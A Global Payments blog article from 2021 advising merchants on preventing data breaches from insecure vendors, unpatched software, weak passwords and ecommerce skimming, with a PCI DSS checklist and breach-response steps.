6 minute read

Tips to prevent the four most common data breaches

Tuesday, October 05, 2021

6 minute read

*Editor's note: This article was updated on October 5, 2021 from its original publish date of November 13, 2019.

With the dramatic growth of ecommerce, cyber threats are on the rise. According to IBM's Cost of a Data Breach Report 2021, data breaches had the highest average cost in 17 years at $4.24 million per breach. A breach could easily disrupt a business—and even threaten its survival. However, by keeping your eye on security, knowing what vulnerabilities to look for and taking precautionary steps, you can greatly reduce your risk of data breaches.

These are the four most common data breach vulnerabilities that cybercriminals are on the hunt for:

1. Unsecure third-party vendors

One of the most common data breach vulnerabilities that directly impacts the security of your business' environment is the use of unsecure third-party vendors. These vendors often provide businesses with payment processing services, but not in a secure manner.

Data thieves have learned they can exploit unsafe vendors to reach several customers and compromise the business' clients' credit card information. One common example involves vendors utilising remote access to the customer's processing environment for routine maintenance. The data thieves looking to exploit a business leverage default passwords or phishing scams directed at the vendor to obtain credentials that grant them access into a business' environment to deploy malware, ultimately leading to card data being compromised.

"Ensure you know all of the third-party vendors that are involved with your credit card environment, and know their roles in that environment," advises Stacy Hughes, Chief Information Security Officer at Global Payments. "You should know if those vendors are PCI DSS compliant and if they are implementing their processes securely."

In addition, verify what security functions your payment provider uses such as encryption, tokenization and 3D Secure to reduce your customer data and fraud risk. A well-secured vendor can offer payment security products that can greatly protect you, and reduce your chance of becoming the victim of a data breach.

2. Security patches

Another common data breach vulnerability involves security patches. In many cases, businesses are not aware that routine security patches for their firewalls, antivirus software or software platforms are out of date. Software and platform providers often release security updates for users to implement to ensure their software is up to date to protect against data breaches and cyber attacks.

"You should complete every necessary security patch on all systems that are linked to your processing environment," said Hughes. "You can schedule these routinely so you don't have to worry about missing any necessary changes."

"By keeping your eye on security, knowing what vulnerabilities to look for and taking precautionary steps, you can greatly reduce your risk of a breach."

3. Weak or stolen passwords

According to Verizon's 2019 Data Breach Investigation Report, 80% of hacking-related activities involve compromised or weak credentials. Typically, weak passwords are the result of using default passwords, such as "password," "welcome," "12345," from third-party vendors. In many cases, account holders forget or fail to change the password that was assigned arbitrarily from a third-party vendor to gain first-time entry. The end result? Hackers exploiting this vulnerability resulting in a potential data breach.

"It's imperative that you create unique passwords associated with your computer systems, internet access and payment environment," Hughes says. "Use strong passwords that include at least seven characters with numbers, symbols and letters – at least one capitalised. And change it frequently, preferably every three months."

Stolen passwords are easily obtained by hackers through phishing attacks. Hackers pretend to be a legitimate contact (for example, part of the IT team) and reach out to your employees trying to trick them into providing their password.

"It's crucial to train your employees on how to protect themselves from phishing attacks, as well as on company security policies. For instance, employees should know to never give out their passwords or login credentials and to be suspicious of emails requesting them," Hughes says.

4. Ecommerce vulnerabilities

Card data thieves will search websites for a number of vulnerabilities like weak or outdated SSL certificates or software platforms. Software platforms like Adobe's Magento often release security updates for users to implement to ensure their software can protect against the latest cyber attacks. However, individuals that are responsible for managing the ecommerce implementations often are not aware, or simply have not taken the necessary steps, to upgrade their solution with these security updates. This leaves them vulnerable to a cyber attack. Cybercriminals can then utilise JavaScript skimmers where they inject malicious JavaScript code into the merchant's website to steal the credit card data.

What's more, cybercriminals are now sophisticated enough to create copies of the merchant's shopping cart or iFrame so they can steal card data. And, to the cardholder, it appears they are still directly on the merchant's website when, in fact, they are not.

Any entity that handles credit cards and accepts them as payment is responsible for ensuring they handle all credit card data securely as guided by the Payment Card Industry Data Security Standard (PCI DSS).

To help you stay on top of security, the following due diligence checklist can help:

  • Have your software platforms been patched with any and all security updates? Are you using the latest version of the software?
  • Do you know whose responsibility it is to implement the updates and patches? Yours or the hosted service provider? Visit the PCI Data Security Standards and reference the roles and responsibilities breakdown in the appendix. It's important to ensure your shopping cart has the most up-to-date security features when accepting payments via the internet. Having a third party such as your payment processor or acquirer maintain or "host" some of these features including JavaScript or iFrames can help better secure your customers' data.
  • Ensure you're utilising the most secure SSLl/TLS certificates such as TLS 1.2
  • Always remember the big three elements present in most data breaches:
    • Software updates and patching are baseline controls critical to your security
    • Password management and strong passwords are essential
    • Tightly manage and limit administrative access, as well as any remote access to the administrative portal

If you discover or have been notified that a compromise or data breach may have occurred, take these steps:

  • Stop processing on the compromised ecommerce environment, at least temporarily. Seek alternative processing methods such as credit card terminals through dial-up.
  • Do not delete anything or attempt to "clean-up" any data. This could impact the success of any needed investigation.
  • Customers of Global Payments should notify us immediately.
  • Notify your third-party hosting provider (if applicable).

As you navigate today's new commerce landscape, we're here to help keep your business and your customers safe. To do so, we created the Merchant Protection Program to assist you with securing your processing environment and achieving PCI DSS compliance. Another helpful resource is the PCI SSC Merchants Microsite, which has many useful guides including patching resources to help with outdated software.